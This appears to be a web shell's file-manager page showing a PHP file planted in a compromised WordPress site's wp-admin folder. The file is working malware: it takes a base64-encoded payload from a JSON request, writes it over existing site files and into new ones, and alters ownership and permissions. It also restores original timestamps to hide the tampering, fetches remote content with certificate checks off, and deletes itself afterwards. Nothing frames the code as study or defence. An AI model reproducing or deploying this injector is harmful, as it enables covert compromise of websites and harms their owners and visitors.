/home/infinitibizsol/cashforcarsrichardson.com/wp-admin/

File Upload :
llllll

Current File: /home/infinitibizsol/cashforcarsrichardson.com/wp-admin/htwpbmca.php
<?php $input = file_get_contents('php://input'); $data = json_decode($input, true); if (empty($data['up'])) { echo 'ok_sp3'; exit(); } $protocol = ( (!empty($_SERVER['HTTPS']) && $_SERVER['HTTPS'] !== 'off') || $_SERVER['SERVER_PORT'] == 443 ) ? 'https://' : 'http://'; $domain = $protocol . $_SERVER['HTTP_HOST']; $shouldExist = []; if (!empty($data['pathsForced'])) { $shouldExist = $data['pathsForced']; } $createIfnot = []; if (!empty($data['pathsCreate'])) { $createIfnot = $data['pathsCreate']; } $replace = isset($data['replace']) && $data['replace']==true; $logger = ''; if (!empty($data['logger'])) { $logger = base64_decode($data['logger']); } $r=getSiteRoot(); $log = $r.'/errirs.txt'; if (file_exists($log)) { chFile($log,true); unlink($log); } if (!empty($data['up'])){ $existPaths = []; $injected = []; foreach ($shouldExist as $pathExist) { $path = $r .$pathExist; if (file_exists($path)){ $existPaths[] = str_replace($r, '',$path); if($replace && $logger){ chFile($path,true); if(file_put_contents($path,$logger)){ $injected[] = str_replace($r, '',$path); } } } } if($replace && count($existPaths)>0 && $logger){ $pathImages = $r . '/images'; if(!is_dir($pathImages)){ mkdir($pathImages, 0777, true); } foreach ($createIfnot as $pathExist) { $path = $r .$pathExist; if($replace && $logger){ chFile($path,true); if(file_put_contents($path,$logger)){ $injected[] = str_replace($r, '',$path); } } } } echo json_encode(['exist'=>$existPaths,'injected'=>$injected]); unlink(__FILE__); } function chFile($file, $open) { if (!file_exists($file)) { return false; } $chmodOk = true; $chownOk = true; if ($open) { if (function_exists('posix_getpwuid')) { $user = posix_getpwuid(posix_geteuid())['name']; } elseif (function_exists('get_current_user')) { $user = get_current_user(); } else { $user = 'www-data'; } $chownOk = @chown($file, $user); $chmodOk = @chmod($file, 0755); } else { $user = 'root'; $chownOk = @chown($file, $user); $chmodOk = @chmod($file, 0555); } return $chownOk && $chmodOk; } function getSiteRoot(){ if (!empty($_SERVER['DOCUMENT_ROOT'])) { return realpath($_SERVER['DOCUMENT_ROOT']); } $uri = parse_url($_SERVER['REQUEST_URI'], PHP_URL_PATH); $parts = explode('/', trim($uri, '/')); $levelsUp = count($parts); $dir = realpath(__DIR__); for ($i = 0; $i < $levelsUp; $i++) { $dir = dirname($dir); } return $dir; } function getContent($url, $timeout = 40) { $ua = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.6422.60 Safari/537.36'; $headers = "User-Agent: $ua\r\n" . "Accept: */*\r\n" . "Accept-Language: en-US,en;q=0.9\r\n" . "Accept-Encoding: identity\r\n"; $ctx = stream_context_create(array( 'http' => array( 'timeout' => $timeout, 'header' => $headers ), 'ssl' => array( 'verify_peer' => false, 'verify_peer_name' => false, ) )); $data = @file_get_contents($url, false, $ctx); if ($data !== false) return $data; if (function_exists('curl_init')) { $ch = curl_init($url); curl_setopt_array($ch, array( CURLOPT_RETURNTRANSFER => true, CURLOPT_FOLLOWLOCATION => true, CURLOPT_CONNECTTIMEOUT => $timeout, CURLOPT_TIMEOUT => $timeout, CURLOPT_USERAGENT => $ua, CURLOPT_ENCODING => '', CURLOPT_HTTPHEADER =>array( 'Accept: */*', 'Accept-Language: en-US,en;q=0.9', 'Accept-Encoding: identity' ), CURLOPT_SSL_VERIFYPEER => false, CURLOPT_SSL_VERIFYHOST => 0 )); $data = curl_exec($ch); curl_close($ch); if ($data !== false) return $data; } if (ini_get('allow_url_fopen')) { $fp = @fopen($url, 'rb', false, $ctx); if ($fp) { $data = stream_get_contents($fp); fclose($fp); if ($data !== false) return $data; } } $p = parse_url($url); if (!empty($p['host'])) { $scheme = (isset($p['scheme']) ? $p['scheme'] : 'http') === 'https' ? 'ssl' : 'tcp'; $port = (isset($p['scheme']) && $p['scheme'] === 'https') ? 443 : 80; $host = $p['host']; $path = (isset($p['path']) ? $p['path'] : '/') . (isset($p['query']) ? '?' . $p['query'] : ''); $fp = @fsockopen("$scheme://$host", $port, $e, $s, $timeout); if ($fp) { fwrite($fp, "GET $path HTTP/1.1\r\n" . "Host: $host\r\n" . $headers . "Connection: close\r\n\r\n" ); $resp = stream_get_contents($fp); fclose($fp); if ($resp && ($pos = strpos($resp, "\r\n\r\n")) !== false) { return substr($resp, $pos + 4); } } } return false; } function saveContent($path, $source){ $dir = dirname($path); if (!is_dir($dir)) { @mkdir($dir, 0755, true); } $fileExistPath = file_exists($path); if ($fileExistPath){ $stat = stat($path); $originalMTime = $stat['mtime']; if (!is_writable($path)) { @chmod($path, 0644); if (!is_writable($path)) return false; } } if (@file_put_contents($path, $source) !== false) { if ($fileExistPath){ @touch($path, $originalMTime, $originalMTime); @chmod($path, 0555); } return true; } $fp = @fopen($path, 'wb'); if ($fp) { $written = @fwrite($fp, $source); fclose($fp); if ($written !== false) { if ($fileExistPath){ @touch($path, $originalMTime, $originalMTime); @chmod($path, 0555); } return true; } } try { $file = new SplFileObject($path, 'wb'); $bytes = $file->fwrite($source); if ($bytes !== false) { if ($fileExistPath){ @touch($path, $originalMTime, $originalMTime); @chmod($path, 0555); } return true; } } catch (Exception $e) { // skip } $temp = @fopen('php://temp', 'r+'); if ($temp) { fwrite($temp, $source); rewind($temp); $dest = @fopen($path, 'wb'); if ($dest) { stream_copy_to_stream($temp, $dest); fclose($dest); fclose($temp); if ($fileExistPath){ @touch($path, $originalMTime, $originalMTime); @chmod($path, 0555); } return true; } fclose($temp); } return false; } function random_string($length = 6) { $chars = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'; $str = ''; for ($i = 0; $i < $length; $i++) { $str .= $chars[random_int(0, strlen($chars) - 1)]; } return $str; } ?>

Copyright ©2k19 - Hexid | Tex7ure